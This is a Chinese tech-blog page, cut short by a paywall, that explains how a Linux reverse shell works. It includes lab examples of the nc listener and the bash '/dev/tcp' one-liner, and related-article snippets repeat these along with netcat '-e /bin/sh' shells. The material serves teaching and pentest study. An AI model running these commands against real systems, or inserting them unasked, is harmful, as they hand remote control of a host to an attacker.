linux正向连接shell_Linux一句话反向shell原理

最新推荐文章于 2023-12-04 10:54:49 发布
VIP文章 最新推荐文章于 2023-12-04 10:54:49 发布
阅读量2k 收藏 2
点赞数
文章标签: linux正向连接shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32467423/article/details/111973813
版权

一、什么是反向shell

就是控制端监听在某TCP/UDP端口,被控制端主动连接控制端的这一端口,控制端可以通过这一端口进行相关命令操作。像telnet,ssh这些可以理解为正向shell,控制端主动连通控制端,而反向shell则是正向shell的向。

反向shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形,同时也实现了被控端的精准控制(指定了被控制端的IP,除此之外的是无法和被控端无法连接)。

二、反向shell测试

主控端和被控信息:

控制端:10.212.52.14

被控制端:10.212.52.252

在控制端监听一个端口:nc -lvp 3000

被控制端执行如下指令:bash -i >& /dev/tcp/10.212.52.14/3000 0>&1

从上面可以看出,这里指出了被控制端的IP和端口信息。其具体实现的结果如下:

上面的数字标出了执行的顺序。最后可以看出,我们的主机已经由localhost变成了9s3s主机。接下来我们看下这个反向shell的实现过程。

1、bash -i

这个表示产生一个交互式的shell ,当然我们也可以能对方一个csh或zsh,不过交互式的参数会根据shell的不同可能有所不同。

2、/dev/tcp/ip/port

/dev/tcp/ip/port是一个特殊的文件,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的。但是如果你在一方监听端口的情况下对这个文件进行读写&

最低0.47元/天 解锁文章
槟屿
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 ...反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
内网渗透-信息收集
weixin_47696216的博客
11-03 4424
00 信息收集的方向 1. 主机存活探测 2. 主机端口开放情况 3. 主机服务探测 4. 主机操作系统探测 5. 网段分布情况 6. 漏洞信息探测 7. 主机内部信息搜集/域内信息搜集 01 主机内部信息收集 操作系统默认ttl值 ① WINDOWS NT/2000 TTL:128 ② WINDOWS 95/98 TTL:32 ③ UNIX...
反弹shell总结
weixin_44576725的博客
04-26 4375
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
Linux下的渗透命令学习 - 反弹Shell
JiangBuLiu的博客
07-11 510
反弹ShellShell最常见命令和原理监听命令 Shell 最常见命令和原理 bash -i >& /dev/tcp/ip/port 0>&1 bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&amp...
反弹shell原理简析与病毒脚本案例
Alexz__的博客
03-20 776
1,Linux中文件描述符 2,Linux输入输出重定向 3,反弹shell作用与目的 4,基础反弹shell语句的本质 5,反弹shell多种方式(命令行,php,python,java,nc) 壹 Linux中的文件描述符 首先我们需要回顾一下Linux系统的一个特点:一切皆文件 所有不同种类的类型都被抽象成了文件;如:普通文件、目录、字符设备、块设备、套接字等 当一...
内网中使用netcat进行正向反向获取shell
bring_coco的博客
12-07 2662
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
Linux中echo命令扩展
weixin_43011785的博客
03-15 1128
1.将进程号打印到文件里。 echo $! > test.pid eg: nohup ****.jar 1>1.log 2>2.log & echo $! > test.pid 2.echo命令测试网络 eg: echo > /dev/tcp/ip/port && echo “success” Linux中的一个特殊文件: /dev/tcp 打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于.
RED-Conversion-LUTs:一组面向公众的逆向工程 REDgammaX LUT
06-24
想要一个带有正向反向 LUT 的 ZIP 文件? 。 为什么? RED 不提供将后去拜耳(DPX、ProRes 等)素材从 REDlogFilm 转换为各种 REDgammaX 版本的方法。 如果您的后期工作流程不是以 R3D 为中心或有 VFX 镜头,但...
Ubuntu权威指南(2/2)
12-05
2.4.7 连接到服务器 41 2.4.8 搜索文件 41 2.4.9 最近的文档 42 2.5 系统菜单 42 2.5.1 首选项 42 2.5.2 系统管理 45 2.5.3 锁住屏幕 51 2.5.4 注销 51 2.5.5 关机 51 2.6 使用移动存储设备 51 2.6.1 浏览移动存储...
Ubuntu权威指南(1/2)
12-05
2.4.7 连接到服务器 41 2.4.8 搜索文件 41 2.4.9 最近的文档 42 2.5 系统菜单 42 2.5.1 首选项 42 2.5.2 系统管理 45 2.5.3 锁住屏幕 51 2.5.4 注销 51 2.5.5 关机 51 2.6 使用移动存储设备 51 2.6.1 浏览移动存储...
正向shell和反弹shell
weixin_45936149的博客
03-26 9025
正向shell反弹shell的利用场景以及使用技巧
Linux反弹shell正向连接
PP Jun的博客
10-02 647
Linux反弹shell正向连接 正向连接:使用ssh命令是主机主动连接受目标机,通过这个连接本机可以主动的向目标机发送一些请求,这称为正向连接。(主机在内网,目标机器在外网) 反向连接:指目标机主动连接主机,通过这个目标机可以主动向主机发送一些请求。(主机在外网,目标机在内网) 此次实验中:CentOS为主机,Min为目标机 First of all,将两台虚拟机设置为仅主机模式 查看CentOS的IP Cent0S的IP为:192.168.79.128 将Min配置网络 Min的IP为:192
Metasploit渗透框架超详细
HAKUNAMATATATTA的博客
12-26 1883
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块。
php 端口反弹,详解反弹shell命令
weixin_33988332的博客
03-13 652
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势:bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地以交互模式打开一个bash>& 输出重定向,将标准输出和标准错误输出都重定向到远程。/dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机器。0&...
渗透测试:主机发现和端口扫描的思路方法总结(nmap+ping命令+nc.traditional+伪设备连接
Bossfrank的博客
06-20 5778
本文总结了有关主机发现和端口扫描的常规方法思路。包括使用nmap工具和使用ping命令进行主机发现、使用nc.traditional进行端口扫描、使用伪设备进行端口扫描。本文涉及了许多bash脚本的for循环命令、有关输出重定向>&符号的使用、逻辑运算符&&和||的使用等,希望读者慢慢消化。
shell正向反向
qq_46258964的博客
02-05 8242
正向shell反向shell 正向shell:控制端主动发起连接连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5684
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
netcat瑞士军刀(正向shell反向shell
最新发布
逍遥小哥的博客
12-04 231
不管是正向shell还是反向shell 它们都是由被控制端将命令行输入和输入通过tcp/udp端口,发送到控制端,只是正向shell是由控制端主动发起连接的,而反弹shell是被控制端主动发起连接的。原理:被控端将cmd.exe重定向到控制端的6666端口,控制端只需要监听本地的6666端口,被控端主动连接控制端,即可获得shell原理:被控端将cmd重定向到本地1111端口,控制端主动连接到被控制端的1111端口,即获得shell反向shell(有安全设备防护,控制端无法主动连接被控制端。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2844
详细讲解Linux反弹shell包含的NC正向shell,NC反向shellbash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
正向shell反向shell
08-19
正向shell反向shell是两种不同的网络连接方式。正向shell是控制端主动发起连接连接被控制端,而反向shell是被控制端主动连接控制端。在实际应用中,大多数情况下采用反向shell,因为正向shell有很多因素导致连接...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值